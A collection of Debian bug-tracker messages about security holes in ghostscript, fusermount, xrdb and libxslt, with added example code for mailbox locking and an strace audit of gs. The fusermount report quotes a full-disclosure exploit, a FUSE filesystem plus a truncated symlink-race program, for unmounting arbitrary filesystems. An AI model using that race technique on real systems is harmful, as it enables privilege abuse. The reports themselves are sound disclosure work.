drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..

/etc/mail/sasl:
total 2
drwxr-xr-x 2 root  smmsp 1024 Jul 16  2008 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..

/etc/mail/smrsh:
total 2
drwxr-sr-x 2 smmta smmsp 1024 Dec 22  2009 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
lrwxrwxrwx 1 root  smmsp   26 Dec 22  2009 mail.local -> /usr/lib/sm.bin/mail.local
lrwxrwxrwx 1 root  smmsp   17 Dec 22  2009 procmail -> /usr/bin/procmail
lrwxrwxrwx 1 root  smmsp   17 Dec 22  2009 vacation -> /usr/bin/vacation

/etc/mail/tls:
total 23
drwxr-xr-x 2 smmta smmsp 1024 Dec 22  2009 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
-rw-r--r-- 1 root  root     7 Dec 22  2009 no_prompt
-rw------- 1 root  root  1191 Dec 22  2009 sendmail-client.cfg
-rw-r--r-- 1 root  smmsp 1249 Dec 22  2009 sendmail-client.crt
-rw------- 1 root  root  1025 Dec 22  2009 sendmail-client.csr
-rw-r----- 1 root  smmsp 1675 Dec 22  2009 sendmail-common.key
-rw-r----- 1 root  smmsp 1582 Dec 22  2009 sendmail-common.prm
-rw------- 1 root  root  1191 Dec 22  2009 sendmail-server.cfg
-rw-r--r-- 1 root  smmsp 1249 Dec 22  2009 sendmail-server.crt
-rw------- 1 root  root  1025 Dec 22  2009 sendmail-server.csr
-rwxr--r-- 1 root  root  3262 Jul 14 06:42 starttls.m4

sendmail.conf:
DAEMON_MODE="Daemon";
DAEMON_PARMS="";
DAEMON_HOSTSTATS="Yes";
DAEMON_MAILSTATS="No";
QUEUE_MODE="${DAEMON_MODE}";
QUEUE_INTERVAL="10";
QUEUE_PARMS="";
MSP_MODE="${QUEUE_MODE}";
MSP_INTERVAL="${QUEUE_INTERVAL}";
MSP_PARMS="${QUEUE_PARMS}";
MSP_MAILSTATS="No";
MISC_PARMS="";
CRON_MAILTO="root";
CRON_PARMS="";
AGE_DATA="";
DAEMON_STATS="${DAEMON_MAILSTATS}";
MSP_STATS="${MSP_MAILSTATS}";


sendmail.mc:
[trigger for usr/share/sendmail/sm_helper.sh]

submit.mc...
FEATURE(`msp [trigger for usr/share/sendmail/sm_helper.sh]


-- System Information:
Debian Release: 6.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-pk05.09-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages sendmail-bin depends on:
ii  libc6 
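Added example, not code from sendmail, mail.local or liblockfile, for the locking order discussed in this report and in the two 2012-08-12 follow-ups: it takes the two locks on an mbox in the order Debian Policy 11.6 prescribes, fcntl() write lock on the open file first and dot lock second, and takes the dot lock non-blockingly the way the strace of bsd-mailx shows, by link()ing a uniquely named temporary file to <mbox>.lock (atomic, also over NFS; fails with EEXIST when another writer holds it). Unlike the strace, the temporary name is built next to the mailbox rather than as a hidden file in the spool directory; the mailbox used by the demo is constructed under /tmp.

```c
/* Added example (not from sendmail or liblockfile): policy-conformant
 * mailbox locking, fcntl() first, dot lock second (non-blocking).
 * The demo mailbox is a constructed temporary file under /tmp. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define LOCKPATH_MAX 4096

/* Lock MBOX for appending. Returns an fd holding the fcntl lock, or -1
 * (errno set). On success *lockpath receives the dot-lock name for
 * mbox_unlock(). */
int mbox_lock(const char *mbox, char *lockpath, size_t lplen)
{
    struct flock fl;
    char tmp[LOCKPATH_MAX];
    int fd, tfd;

    fd = open(mbox, O_WRONLY | O_APPEND);
    if (fd < 0)
        return -1;

    /* 1. fcntl() first: wait for an exclusive write lock on the whole file. */
    memset(&fl, 0, sizeof fl);
    fl.l_type = F_WRLCK;
    fl.l_whence = SEEK_SET;
    fl.l_start = 0;
    fl.l_len = 0;
    if (fcntl(fd, F_SETLKW, &fl) < 0) {
        close(fd);
        return -1;
    }

    /* 2. dot lock second, never blocking: create a unique file, link() it
     *    to <mbox>.lock, drop the temporary name. link() either succeeds
     *    atomically or fails with EEXIST while another process holds it. */
    snprintf(tmp, sizeof tmp, "%s.lk%ld", mbox, (long)getpid());
    snprintf(lockpath, lplen, "%s.lock", mbox);
    tfd = open(tmp, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (tfd < 0) {
        close(fd);
        return -1;
    }
    close(tfd);
    if (link(tmp, lockpath) < 0) {
        int e = errno;
        unlink(tmp);
        close(fd);      /* closing the fd releases the fcntl lock */
        errno = e;
        return -1;
    }
    unlink(tmp);
    return fd;
}

/* Release in reverse order: dot lock first, then the fcntl lock (close). */
int mbox_unlock(int fd, const char *lockpath)
{
    int r = unlink(lockpath);
    close(fd);
    return r;
}

/* Demo on a constructed mailbox: the first lock succeeds, a second attempt
 * from this process is refused at the dot-lock step with EEXIST (fcntl
 * locks are per process, so only link() can say no here), and after
 * unlock the .lock file is gone. Returns 1 when all of that holds. */
int demo_lock_order(void)
{
    char mbox[] = "/tmp/mbox-demo-XXXXXX";
    char lock1[LOCKPATH_MAX], lock2[LOCKPATH_MAX];
    int fd, fd2, ok;

    fd = mkstemp(mbox);
    if (fd < 0)
        return 0;
    close(fd);

    fd = mbox_lock(mbox, lock1, sizeof lock1);
    fd2 = mbox_lock(mbox, lock2, sizeof lock2);
    ok = fd >= 0 && fd2 < 0 && errno == EEXIST && access(lock1, F_OK) == 0;
    if (fd >= 0)
        ok = ok && mbox_unlock(fd, lock1) == 0 && access(lock1, F_OK) != 0;
    unlink(mbox);
    return ok;
}

int main(void)
{
    printf("fcntl-then-dotlock sequence behaves as expected: %s\n",
           demo_lock_order() ? "yes" : "no");
    return 0;
}
```

A caller that gets -1 with errno == EEXIST should back off and retry, which is the "non blocking" alternative the policy text allows; taking the dot lock with a blocking wait while already holding the fcntl lock is exactly the ordering that can deadlock against a program doing the reverse.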

Bug#621691: libxslt1.1: XML Security Library "xslt.c" Arbitrary File Access

2011-04-07 Thread Paul Szabo
Package: libxslt1.1
Version: 1.1.24-2
Severity: grave
Tags: security
Justification: user security hole


Please note messages:
  http://www.sans.org/newsletters/risk/display.php?v=10&i=14#11.15.18
  http://www.aleksey.com/pipermail/xmlsec/2011/009120.html
Seems to me that Debian is affected.
(I do not use XML so did not verify.)

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.8
  APT prefers oldstable
  APT policy: (500, 'oldstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-pk04.09-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages libxslt1.1 depends on:
ii  libc6   2.7-18lenny7 GNU C Library: Shared libraries
ii  libgcrypt11 1.4.1-1  LGPL Crypto library - runtime libr
ii  libxml2 2.6.32.dfsg-5+lenny3 GNOME XML library

libxslt1.1 recommends no packages.

libxslt1.1 suggests no packages.

-- no debconf information






Bug#621423: /usr/bin/xrdb: xdmcp rogue hostname security

2011-04-06 Thread Paul Szabo
Package: x11-xserver-utils
Version: 7.3+5
Severity: critical
File: /usr/bin/xrdb
Tags: security
Justification: root security hole


About the security bug in xrdb :
  http://security-tracker.debian.org/tracker/CVE-2011-0465
  http://www.ubuntu.com/usn/usn-1107-1
  https://bugs.launchpad.net/ubuntu/+source/x11-xserver-utils/+bug/752315
  http://lists.freedesktop.org/archives/xorg-announce/2011-April/001636.html
  http://cgit.freedesktop.org/xorg/app/xrdb/commit/?id=1027d5df07398c1507fb1fe3a9981aa6b4bc3a56
  http://www.securityfocus.com/bid/47189
As I understand, the result of a breach would be root access on the
server. Debian seems to have flagged this as low priority because xdmcp
is not enabled in default setup; though the issue is exploitable via
dhcp also.

In my environment we use xdmcp for users to log in to our servers.
Could I please have ideas about workaround protection?

I know that gdm uses /etc/hosts.allow and there I added the lines:

ALL : UNKNOWN  : twist /bin/echo 'No name "%n" for address "%a" -\r\n May be DNS failure - Please try again later'
ALL : PARANOID : twist /bin/echo 'Name "%n" and address "%a" mismatch -\r\n May be DNS failure - Please try again later'
gdm : all : allow

However I notice that gdm uses IP address only, not hostname when
evaluating hosts.allow lines, so I wonder about the effectiveness
of this protection.

How would I test whether my setup is vulnerable?

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.8
  APT prefers oldstable
  APT policy: (500, 'oldstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-pk04.09-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages x11-xserver-utils depends on:
ii  cpp 4:4.3.2-2The GNU C preprocessor (cpp)
ii  libc6   2.7-18lenny7 GNU C Library: Shared libraries
ii  libice6 2:1.0.4-1X11 Inter-Client Exchange library
ii  libsm6  2:1.0.3-2X11 Session Management library
ii  libx11-62:1.1.5-2X11 client-side library
ii  libxau6 1:1.0.3-3X11 authorisation library
ii  libxaw7 2:1.0.4-2X11 Athena Widget library
ii  libxext62:1.0.4-2X11 miscellaneous extension librar
ii  libxi6  2:1.1.4-1X11 Input extension library
ii  libxmu6 2:1.0.4-1X11 miscellaneous utility library
ii  libxmuu12:1.0.4-1X11 miscellaneous micro-utility li
ii  libxrandr2  2:1.2.3-1X11 RandR extension library
ii  libxrender1 1:0.9.4-2X Rendering Extension client libra
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library
ii  libxtrap6   2:1.0.0-5X11 event trapping extension libra
ii  libxxf86misc1   1:1.0.1-3X11 XFree86 miscellaneous extensio
ii  libxxf86vm1 1:1.0.2-1X11 XFree86 video mode extension l
ii  x11-common  1:7.3+20 X Window System (X.Org) infrastruc

x11-xserver-utils recommends no packages.

x11-xserver-utils suggests no packages.

-- no debconf information






Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem

2011-01-19 Thread paul . szabo
Ubuntu claims to have this fixed:
https://bugs.launchpad.net/bugs/670622
http://www.ubuntu.com/usn/usn-1045-1
http://www.ubuntu.com/usn/usn-1045-2
Last two references not yet available, see
https://lists.ubuntu.com/archives/ubuntu-security-announce/2011-January/date.html
instead.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia






Bug#584653: RC bugs in upcoming stable

2010-12-01 Thread paul . szabo
Arne mentioned 
http://security-tracker.debian.org/tracker/CVE-2010-2055
and in there, I see:
 - Bug #592569 is referenced. Surely wrong: that CVE pre-dates my
   request to make -dSAFER the default, was about -P- and similar.
 - "experimental 9.00~dfsg-2 vulnerable" whereas bugs #584653 and
   #584663 are marked "Fixed in version 9.00~dfsg-1".

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia






Bug#584653: ghostscript: does not honor -P- option

2010-11-27 Thread paul . szabo
Dear Mehdi,

> We prefer targeted fixes ...
> ... we won't be able to review [gs 9.00] or accept it ...

Supposing that those "targeted fixes" may not happen. Would you then
release gs 8.71 with a grave (= RC) bug? Or would you drop gs, or delay
squeeze? I am genuinely curious.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia






Bug#584663: imagemagick uses gs without -P-

2010-11-22 Thread paul . szabo
Dear Jonas,

Sorry, but I do not understand.

>>Too late now for [#583183] ... I now noticed that imagemagick
>>also uses gs, and invokes it with -dPARANOIDSAFER but without -P-.
>
> Do *NOT* "cross-post" bug info between bugreports! ...
> You do *not* help if "spamming" the bugreports. :-(

I wanted to point out in this bug #584663 that imagemagick is affected
by it. Only in passing I bemoaned the fact that the "definitive list" of
affected packages cannot be updated in #583183.

> ... the treatment of the issue did not go to your liking.

Most of the issues are OK now, I am happy. Fixes in place... except, not
certain yet whether the fix will make it into squeeze (why not into
lenny, via a DSA? lesser issues were given DSAs); and -dSAFER is not yet
a default, but that is "not this bug" (so I did not mention it here).

I do apologize if I misunderstood something, and done the wrong thing
yet again.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia






Bug#584663: imagemagick uses gs without -P-

2010-11-22 Thread paul . szabo
Too late now for
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#54
(as that is archived, un-changeable). I now noticed that imagemagick
also uses gs, and invokes it with -dPARANOIDSAFER but without -P-.

Good thing this bug is now "fixed". (I will not report a bug against
imagemagick, no need for more "mass bug filing".)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem

2010-11-22 Thread paul . szabo
Ubuntu has now added the reference CVE-2010-3879 to
https://bugs.launchpad.net/bugs/670622 and marked in "confirmed".
Other interesting references:
https://bugzilla.redhat.com/show_bug.cgi?id=651183
https://bugzilla.novell.com/show_bug.cgi?id=651598

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584663: Bug#584653: Patch to close CVE-2010-2055

2010-11-20 Thread paul . szabo
Dear Jonas,

>>> deb http://debian.jones.dk/ squeeze printing
>>
>>I have now upgraded a machine to squeeze and tried your
>>ghostscript 9.00~dfsg-1~0jones1
>>package, it works perfectly, thanks.
>>[snip]
>>Seems to me that in your package, the default is -P- (not -P).
>>Should not this be mentioned in bug #584663 ?
>
> It seems that you are more knowledgeable in that bug than me, and I
> would appreciate your judgement:
>
> Do you mean to say that bug#584663 is closed too with upstream release
> 9.00?

Yes. Compare the outputs of commands (sorry long lines, may wrap):

strace -o x.out /usr/bin/gs -P- x.ps >/dev/null 2>&1; grep -E '^(open|stat|access)' x.out | grep -E -v '"/(usr|etc|var|lib)/'
strace -o x.out /usr/bin/gs x.ps >/dev/null 2>&1; grep -E '^(open|stat|access)' x.out | grep -E -v '"/(usr|etc|var|lib)/'
strace -o x.out /usr/bin/gs -P  x.ps >/dev/null 2>&1; grep -E '^(open|stat|access)' x.out | grep -E -v '"/(usr|etc|var|lib)/'

The first two are identical: attempt to load various things from
"proper" places only, not current dir.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia
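
The strace comparison in the message above, turned into a reusable check. This is an added example, not code from Paul's message or from the Debian or ghostscript projects. nonsystem_paths pulls the path out of each open/openat/stat/lstat/access line of an strace log and reports every path outside the system prefixes the message greps away; relative paths (anything gs looked up in ".") show up immediately. audit_gs runs gs under strace and feeds the log to it; "gs" and "strace" on PATH are the only assumptions.

```shell
#!/bin/sh
# Added example (not from the bug thread): automate the strace comparison
# of gs path lookups. Sample logs in the test are constructed, not captured.

# nonsystem_paths LOG [INPUTFILE]
# Print, one per line, every path in LOG that is not under /usr, /etc, /var
# or /lib, skipping INPUTFILE itself (the document being rendered is always
# touched and is not interesting). Returns 1 when any such path was found,
# 0 when the run touched system locations only.
nonsystem_paths() {
    log="$1"
    input="${2:-}"
    # strace -f prefixes lines with a pid, hence the optional leading number.
    found=$(grep -E '^([0-9]+ +)?(open|openat|stat|lstat|access)\(' "$log" \
        | sed -n 's/^[^"]*"\([^"]*\)".*$/\1/p' \
        | grep -E -v '^/(usr|etc|var|lib)/' \
        | { if [ -n "$input" ]; then grep -Fvx -- "$input"; else cat; fi; } \
        | LC_ALL=C sort -u)
    if [ -n "$found" ]; then
        printf '%s\n' "$found"
        return 1
    fi
    return 0
}

# audit_gs GSOPTIONS... INPUTFILE
# Run gs under strace with the given arguments (the last one being the input
# file) and report the non-system paths it touched.
audit_gs() {
    if ! command -v strace >/dev/null 2>&1; then
        echo "audit_gs: strace not found" >&2
        return 2
    fi
    last=""
    for a in "$@"; do last="$a"; done
    log=$(mktemp) || return 2
    # stdin from /dev/null so gs can never wait at its interactive prompt
    strace -o "$log" gs "$@" </dev/null >/dev/null 2>&1 || true
    if nonsystem_paths "$log" "$last"; then rc=0; else rc=1; fi
    rm -f "$log"
    return "$rc"
}
```

Run it once with -P- and once without, e.g. `audit_gs -P- -dSAFER -dBATCH -dNOPAUSE -sDEVICE=nullpage x.ps` versus `audit_gs -dBATCH -dNOPAUSE -sDEVICE=nullpage x.ps`: a fixed gs prints nothing in both cases, while a gs that still honours "." lists names such as Fontmap looked up relative to the current directory. An output file named with -sOutputFile= outside the system prefixes is reported too, which is expected.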



Bug#584653: Patch to close CVE-2010-2055

2010-11-20 Thread paul . szabo
Dear Julien,

>> Will this make it into squeeze? ...
> See the version graph at
> http://bugs.debian.org/584653
> The affected versions seem to be marked correctly.

What I was asking... When the squeeze release is being put together
and they look at ghostscript, will they say:
  1 - The bug is done, ghostscript is OK.
  2 - Version 8.71 has a grave i.e. RC bug, must upgrade to 9.00.
(or something else)? Your reply suggests that they will choose "2",
in effect assuring me that this will make it into squeeze.

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584653: Patch to close CVE-2010-2055

2010-11-20 Thread paul . szabo
Dear Jonas,

> ... I have backported it ...
> deb http://debian.jones.dk/ squeeze printing

I have now upgraded a machine to squeeze and tried your
ghostscript 9.00~dfsg-1~0jones1
package, it works perfectly, thanks.

Will this make it into squeeze? Seems not, being a backport.
Should not this bug #584653 be left open (not "done"), as a
reminder that squeeze is insecure? Or maybe, that is tracked
in some way I am not aware of.

Seems to me that in your package, the default is -P- (not -P).
Should not this be mentioned in bug #584663 ?

Could your package include the patch for bug #592569 also,
to have -dSAFER as default?

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem

2010-11-03 Thread paul . szabo
Dear Adam,

> It would be more helpful if you checked, before filing grave bugs on
> packages.

I apologize for my laziness. I do not normally use fuse. Maybe I could
set up a test machine, but (unless I succeeded in the exploit) would not
properly know whether Debian was safe. I thought it was better to warn
now, than leave blissfully vulnerable.

> This sounds very much like CVE-2009-3297, which has been fixed in
> unstable, testing and stable since February (see DSA-1989-1).

The page  http://www.debian.org/security/2010/dsa-1989  refers to
http://bugs.debian.org/567633  which says:
  a race condition if two fusermount -u instances are run in parallel
so that does not seem to be the same issue.

The page  http://security-tracker.debian.org/tracker/DSA-1989-1  points
to  http://security-tracker.debian.org/tracker/CVE-2010-0789  which
mentions "a symlink attack", which may be closer to this issue.

I would expect DSA-1989 to have been adopted and fixed by Ubuntu,
where the original poster says he found the issue.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem

2010-11-03 Thread Paul Szabo
Package: fuse-utils
Version: 2.7.4-1.1+lenny1
Severity: grave
File: /usr/bin/fusermount
Tags: security
Justification: user security hole


As reported on a public mailing list, fusermount in Ubuntu allows
unprivileged users to unmount anything. I wonder if Debian is affected.
Relevant files attached below.

Cheers,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-pk04.00-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages fuse-utils depends on:
ii  adduser 3.110add and remove users and groups
ii  libc6   2.7-18lenny6 GNU C Library: Shared libraries
ii  libfuse22.7.4-1.1+lenny1 Filesystem in USErspace library
ii  makedev 2.3.1-88 creates device files in /dev
ii  sed 4.1.5-6  The GNU sed stream editor
ii  udev0.125-7+lenny3   /dev/ and hotplug management daemo

fuse-utils recommends no packages.

fuse-utils suggests no packages.

-- no debconf information
Title:  [Full-disclosure] fusermount: Unmount any filesystem
halfdog
me at halfdog.net
Tue Nov  2 17:44:11 GMT 2010

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello List,

To evaluate the pros and cons of various disclosure methods, I'm trying
full disclosure this time:

At least on ubuntu lucid, the fusermount tool contains a timerace
mounting a user filesystem and updating mtab, thus mtab entries with
arbitrary path can be created. Crafted mtab entries can then be used to
unmount live parts of the filesystem.

http://www.halfdog.net/Security/FuseTimerace/

- -- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFM0E3rxFmThv7tq+4RAmavAJ9JNdwF6R0gv1FlIZ3to1QrkQs90wCgkUvA
IpD9Wfe/viLLIMLEfE1B2yo=
=tFrk
-END PGP SIGNATURE-


www.halfdog.net:Security:FuseTimerace:index.html
Description: XML document
/** Minimal userspace file system demo, compile using
 *  gcc -D_FILE_OFFSET_BITS=64 -lfuse -Wall FuseMinimal.c -o FuseMinimal
 *
 *  Copyright (c) halfdog 
 *  
 *  This software is provided by the copyright owner "as is" to
 *  study it but without any expressed or implied warranties, that
 *  this software is fit for any other purpose. If you try to compile
 *  or run it, you do it solely on your own risk and the copyright
 *  owner shall not be liable for any direct or indirect damage
 *  caused by this software.
 */

#define FUSE_USE_VERSION 26

#include <fuse.h>      /* fuse_main, struct fuse_operations, struct stat */
#include <string.h>    /* memset, strcmp */
#include <errno.h>     /* ENOENT */

static int io_getattr(const char *path, struct stat *stbuf) {
  int res=-1;
  memset(stbuf, 0, sizeof(struct stat));
  if (strcmp(path, "/") == 0) {
    stbuf->st_mode=S_IFDIR|0755;
    stbuf->st_nlink=2;
    res=0;
  }
  return(res);
}


static int io_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
    off_t offset, struct fuse_file_info *fi) {
  (void) offset;
  (void) fi;
  if(strcmp(path, "/")!=0) return -ENOENT;

  filler(buf, ".", NULL, 0);
  filler(buf, "..", NULL, 0);
  return 0;
}

static struct fuse_operations hello_oper = {
  .getattr  = io_getattr,
  .readdir  = io_readdir,
};

int main(int argc, char *argv[]) {
  return fuse_main(argc, argv, &hello_oper, NULL);
}
/** This program waits for notify of file/directory to replace
 *  given directory with symlink.
 *  Pa

Bug#584653: Debian NMU ghostscript

2010-10-25 Thread paul . szabo
Dear Julián,

> ... I think that bug 584663 is the same bug 584653 ...

Sorry no, they are NOT the same bug. Bug 584653 is about things being
wrong even if you explicitly use the option "-P-". Bug 584663 is about
changing the default behaviour from the unsafe "-P" to the (hopefully
working, secure) "-P-".

(These bugs are related. I had tried to report them as the "one thing"
bug 583183, but that did not get very far...)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584663: ghostscript: insecure defaults for path searching

2010-08-12 Thread paul . szabo
Dear Jonas,

>>>>and that it will not be rudely and wrongly closed like #583183 ...
> Please post such info to the actual bug where it is relevant.

Cannot: bug is closed, archived.

> Other people read the bugreports too.  If you post your complaints ...
> you may still help shift the agenda ...

Thanks for understanding.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584663: ghostscript: insecure defaults for path searching

2010-08-11 Thread paul . szabo
Dear Jonas,

>>and that it will not be rudely and wrongly closed like #583183 was in
>>http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=91;bug=583183
>
> I disagree that the mass-filed bug was wrongly or rudely closed.

Hmm... Maybe the closer could have had the courtesy to CC me (e.g. by
CCing #583183, not mailing just to control): was stealthy, rude.

Maybe the "mass filed bugs" had a reason to be closed, but not #583183
itself. Seems that #584066 was merged with #583183 as per
http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=9;bug=584066
(which is reasonable); then when #584066 was closed (as above), it
closed #583183 instead: surely unintended, wrong.

> ... I suggest you ask for elaboration ...

Sadly, many of those people are not nice enough to respond.

> ... or try read the nice documentation at
> http://www.debian.org/Bugs/ which I believe covers e.g. mass-filing.

I do try to keep up. (Not much time left after useless arguments...)

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584663: ghostscript: insecure defaults for path searching

2010-08-10 Thread paul . szabo
Dear Jonas,

>>> I think we should change the default to -dSAFER ...
> I think the safest is to track it as a separate bug.

Following your advice, I have now opened bug #592569 . 

Hoping I will not get abused for following such advice, as I got for
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#42
and that it will not be rudely and wrongly closed like #583183 was in
http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=91;bug=583183

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#592569: ghostscript: Please make -dSAFER the default

2010-08-10 Thread Paul Szabo
Package: ghostscript
Version: 8.62.dfsg.1-3.2lenny4
Severity: grave
Tags: security
Justification: user security hole


Please make the -dSAFER option the default.

For discussion, rationale etc please see bugs #583183 and #584663, and
particularly:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584663#55

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.5
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.18-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages ghostscript depends on:
ii  debconf [debc 1.5.24 Debian configuration management sy
ii  debianutils   2.30   Miscellaneous utilities specific t
ii  defoma0.11.10-0.2Debian Font Manager -- automatic f
ii  gs-common 8.62.dfsg.1-3.2lenny4  Dummy package depending on ghostsc
ii  gsfonts   1:8.11+urwcyr1.0.7~pre44-3 Fonts for the Ghostscript interpre
ii  libc6 2.7-18lenny4   GNU C Library: Shared libraries
ii  libgs88.62.dfsg.1-3.2lenny4  The Ghostscript PostScript/PDF int

Versions of packages ghostscript recommends:
ii  psfontmgr0.11.10-0.2 PostScript font manager -- part of

Versions of packages ghostscript suggests:
ii  ghostscript-x  8.62.dfsg.1-3.2lenny4 The GPL Ghostscript PostScript/PDF
pn  hpijs  (no description available)

-- no debconf information






Bug#584663: ghostscript: insecure defaults for path searching

2010-08-09 Thread paul . szabo
Dear Moritz,

> I think we should change the default to -dSAFER, but postpone it for
> Squeeze+1. That is something which should be thoroughly tested in
> unstable for a few months.

Thanks. Will this now be taken care of, or should I open another "grave"
bug against ghostscript?

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584653: ghostscript: does not honor -P- option

2010-08-08 Thread paul . szabo
I wonder if this is now fixed upstream:
http://bugs.ghostscript.com/show_bug.cgi?id=691350#c19

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584663: ghostscript: insecure defaults for path searching

2010-08-08 Thread paul . szabo
Seems this is now fixed upstream:
http://bugs.ghostscript.com/show_bug.cgi?id=691350#c19
I wonder if that fixes
http://bugs.debian.org/584653
also.

---

Is this a good time to ask to make -dSAFER the default? (Or should that
be -dPARANOIDSAFER, does that still exist?)

---

I find it pleasing that upstream finally seems to have made -P- the
default, after all the ugly shouting (now deleted) saying WONTFIX in
http://bugs.ghostscript.com/show_bug.cgi?id=691316
http://bugs.ghostscript.com/show_bug.cgi?id=691339

---

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584663: ghostscript: insecure defaults for path searching

2010-08-07 Thread paul . szabo
>> Yes. All those who wish to call gs in unsafe ways, can (should!)
>> explicitly use -P (and -NOSAFER).
> You surely meant "-dNOSAFER", not "-NOSAFER".

Sorry, wrote that carelessly "from memory", without consulting the
oh-so-useless Debian man page. Yes, I did mean -dNOSAFER.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



Bug#584663: ghostscript: insecure defaults for path searching

2010-08-06 Thread paul . szabo
Dear Moritz,

> I looked into this during DebConf: We could modify the default ...
> but this would cause regressions ...

Yes. All those who wish to call gs in unsafe ways, can (should!)
explicitly use -P (and -NOSAFER). The alternative is to ensure all
Debian packages explicitly use -P-, but that was "voted down" and
branded "mass bug filing".

We have a duty of care to the simple user, who innocently types
  gs myfile.ps
